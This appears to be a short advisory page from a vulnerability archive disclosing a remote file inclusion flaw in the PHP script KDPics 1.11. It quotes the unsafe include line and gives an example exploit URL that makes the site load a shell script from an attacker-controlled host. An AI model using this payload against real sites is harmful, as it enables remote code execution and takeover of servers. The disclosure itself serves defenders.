KDPics 1.11 remote file inclusion vulnerability.

2010-08-09 / 2010-08-10

Credit: Fl0riX

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

========================================================
= Author: Fl0riX - Bug Researchers
= Application  Name : KDPics
 v1.11
= Vulnerable  Type: Remote File Inclusion
= Download: 
http://www.phpscripts-fr.net/scripts/download.php?id=2212
= Risk : 
High
= Infection: Uzaktan Dosya Dahil edilebilir.
========================================================
=
 Error c0d3;
     include "$page.inc.php3";
========================================================
=
 Example;
 site/index.php3?page=http://fl0rix/shell.txt?
========================================================

 		 	   		  

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

KDPics 1.11 remote file inclusion vulnerability.

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.